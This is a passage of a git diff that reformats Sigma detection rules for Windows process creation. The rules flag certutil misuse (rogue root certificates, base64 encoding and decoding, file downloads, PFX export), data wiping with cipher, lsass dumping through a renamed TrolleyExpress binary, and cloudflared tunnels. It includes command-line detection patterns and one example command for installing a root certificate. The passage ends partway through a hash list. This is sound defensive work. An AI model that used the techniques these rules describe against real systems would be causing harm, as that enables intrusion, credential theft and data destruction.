the "addstore" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -24,21 +20,21 @@ logsource: category: process_creation product: windows detection: + # Example: certutil -addstore -f -user ROOT CertificateFileName.der process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli_add: - CommandLine|contains: + CommandLine|contains: - /addstore - -addstore selection_cli_store: - CommandLine|contains: root + CommandLine|contains: root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml index 364aa2d78..c73420a3b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml @@ -1,9 +1,7 @@ title: File Decoded From Base64/Hex Via Certutil.EXE id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 status: test -description: Detects the execution of certutil with either the "decode" or "decodehex" - flags to decode base64 or hex encoded files. This can be abused by attackers to - decode an encoded payload before execution +description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ @@ -24,12 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Decode Base64 - '-decode ' - '/decode ' + # Decode Hex - '-decodehex ' - '/decodehex ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml index edbc726eb..1a02b1fc0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml @@ -1,19 +1,17 @@ title: Suspicious Download Via Certutil.EXE id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b related: - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files. +description: Detects the execution of certutil with certain flags that allow the utility to download files. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 tags: - attack.defense_evasion @@ -26,14 +24,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 111412c98..b3e24ab7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From Direct IP Via Certutil.EXE id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files from direct IPs. +description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -28,14 +27,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -45,8 +44,31 @@ detection: - ://7 - ://8 - ://9 + # filter_local_ips: + # # Note: Uncomment this filter if you want to exclude local IPs + # CommandLine|contains: + # - '://10.' # 10.0.0.0/8 + # - '://192.168.' # 192.168.0.0/16 + # - '://172.16.' # 172.16.0.0/12 + # - '://172.17.' + # - '://172.18.' + # - '://172.19.' + # - '://172.20.' + # - '://172.21.' + # - '://172.22.' + # - '://172.23.' + # - '://172.24.' + # - '://172.25.' + # - '://172.26.' + # - '://172.27.' + # - '://172.28.' + # - '://172.29.' + # - '://172.30.' + # - '://172.31.' + # - '://127.' # 127.0.0.0/8 + # - '://169.254.' # 169.254.0.0/16 filter_main_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml index 1bca87a29..e6741f9e3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download + type: similar status: experimental -description: Detects the execution of certutil with certain flags that allow the utility - to download files from file-sharing websites. +description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml index dff06146c..3d00e22c3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml @@ -1,14 +1,12 @@ title: File Encoded To Base64 Via Certutil.EXE id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a status: test -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64. This can be abused by threat actors and attackers for data exfiltration +description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/02/24 modified: 2023/02/15 tags: @@ -22,15 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode condition: process_creation and (all of selection_*) falsepositives: - - As this is a general purpose rule, legitimate usage of the encode functionality - will trigger some false positives. Apply additional filters accordingly + - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml index e43f1f98e..d931774f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml @@ -1,11 +1,10 @@ title: Suspicious File Encoded To Base64 Via Certutil.EXE id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the extensions of the file is suspicious +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -24,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: - .acl - .bat - .doc diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml index 3c69e02b7..4ed3e45c9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml @@ -1,11 +1,10 @@ title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the files are located in potentially suspicious locations +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -24,14 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more suspicious locations to increase coverage - \AppData\Roaming\ - \Desktop\ - \Local\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml index ca6ac96a9..f2b4f8078 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via Certutil.EXE id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 status: test -description: Detects the execution of the certutil with the "exportPFX" flag which - allows the utility to export certificates. +description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. references: - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 modified: 2023/02/20 tags: @@ -20,15 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-exportPFX ' - '/exportPFX ' condition: process_creation and (all of selection_*) falsepositives: - - There legitimate reasons to export certificates. Investigate the activity to - determine if it's benign + - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index c3f20590a..173d11efb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -syncwithWU ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml b/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml index 12a91d66b..264af0a1d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml +++ b/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml @@ -1,8 +1,7 @@ title: Suspicious CodePage Switch Via CHCP id: c7942406-33dd-4377-a564-0f62db0593a3 status: test -description: Detects a code page switch in command line or batch scripts to a rare - language +description: Detects a code page switch in command line or batch scripts to a rare language references: - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers - https://twitter.com/cglyer/status/1183756892952248325 @@ -20,15 +19,18 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: - - ' 936' - - ' 1258' - NewProcessName|endswith: \chcp.com + CommandLine|endswith: + - ' 936' # Chinese + # - ' 1256' # Arabic + - ' 1258' # Vietnamese + # - ' 855' # Russian + # - ' 866' # Russian + # - ' 864' # Arabic + NewProcessName|endswith: \chcp.com condition: process_creation and selection fields: - ParentCommandLine falsepositives: - - Administrative activity (adjust code pages according to your organization's - region) + - Administrative activity (adjust code pages according to your organization's region) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml index 8ee532c4d..b7fc71e23 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml @@ -1,16 +1,10 @@ title: Deleted Data Overwritten Via Cipher.EXE id: 4b046706-5789-4673-b111-66f25fe99534 status: test -description: 'Detects usage of the "cipher" built-in utility in order to overwrite - deleted data from disk. - - Adversaries may destroy data and files on specific systems or in large numbers - on a network to interrupt availability to systems, services, and network resources. - - Data destruction is likely to render stored data irrecoverable by forensic techniques - through overwriting files or data on local and remote drives - - ' +description: | + Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. + Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive author: frack113 @@ -27,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: CIPHER.EXE - - NewProcessName|endswith: \cipher.exe + - OriginalFileName: CIPHER.EXE + - NewProcessName|endswith: \cipher.exe selection_cli: - CommandLine|contains: ' /w:' + CommandLine|contains: ' /w:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml index a4f5be0e3..83d6ce167 100644 --- a/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml @@ -1,8 +1,7 @@ title: Process Access via TrolleyExpress Exclusion id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 status: test -description: Detects a possible process memory dump that uses the white-listed Citrix - TrolleyExpress.exe filename as a way to dump the lsass process memory +description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.youtube.com/watch?v=Ie831jF0bb0 @@ -22,20 +21,22 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter - \TrolleyExpress 7 - \TrolleyExpress 8 - \TrolleyExpress 9 - \TrolleyExpress.exe 7 - \TrolleyExpress.exe 8 - \TrolleyExpress.exe 9 + # Common dumpers - '\TrolleyExpress.exe -ma ' renamed: - NewProcessName|endswith: \TrolleyExpress.exe + NewProcessName|endswith: \TrolleyExpress.exe filter_renamed: OriginalFileName|contains: CtxInstall filter_empty: - OriginalFileName: null + OriginalFileName: condition: process_creation and (selection or ( renamed and not 1 of filter* )) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml b/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml index 0a5f9c680..3ce9ac1fe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml @@ -1,9 +1,7 @@ title: Data Copied To Clipboard Via Clip.EXE id: ddeff553-5233-4ae9-bbab-d64d2bd634be status: test -description: Detects the execution of clip.exe in order to copy data to the clipboard. - Adversaries may collect data stored in the clipboard from users copying information - within or between applications. +description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md @@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \clip.exe - - OriginalFileName: clip.exe + - NewProcessName|endswith: \clip.exe + - OriginalFileName: clip.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml index 7d80e1928..85a29faeb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml @@ -1,10 +1,8 @@ title: Cloudflared Portable Execution id: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd status: experimental -description: 'Detects the execution of the "cloudflared" binary from a non standard - location. - - ' +description: | + Detects the execution of the "cloudflared" binary from a non standard location. references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared @@ -24,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \cloudflared.exe + NewProcessName|endswith: \cloudflared.exe filter_main_admin_location: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\cloudflared\ - :\Program Files\cloudflared\ condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml index 9d23e479c..f00b1c2f3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml @@ -1,20 +1,15 @@ title: Cloudflared Quick Tunnel Execution id: 222129f7-f4dc-4568-b0d2-22440a9639ba related: - - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a - type: similar - - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 - type: similar + - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a + type: similar + - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 + type: similar status: experimental -description: 'Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be - used to tunnel local services such as HTTP, RDP, SSH and SMB. - - The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, - following a call to api[.]trycloudflare[.]com. - +description: | + Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. + The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. - - ' references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared @@ -33,58 +28,61 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cloudflared.exe - - \cloudflared-windows-386.exe - - \cloudflared-windows-amd64.exe - - Hashes|contains: - - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 - - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 - - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 - - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 - - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 - - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 - - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 - - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a - - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 - - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 - - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 - - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac - - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f - - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d - - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 - - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b - - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f - - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 - - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 - - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f - - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 - - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c - - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f - - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 - - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 - - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 - - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c - - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 - - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f - - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad - - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 - - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 - - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 - - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 - - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f - - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 - - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + - NewProcessName|endswith: + - \cloudflared.exe + - \cloudflared-windows-386.exe + - \cloudflared-windows-amd64.exe + - Hashes|contains: + - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 + - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 + - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 + - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 + - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 + - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 + - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 + - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a + - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 + - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 + - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 + - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac + - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f + - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d + - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 + - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b + - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f + - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 + - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 + - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f + - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 + - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c + - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f + - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 + - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 + - 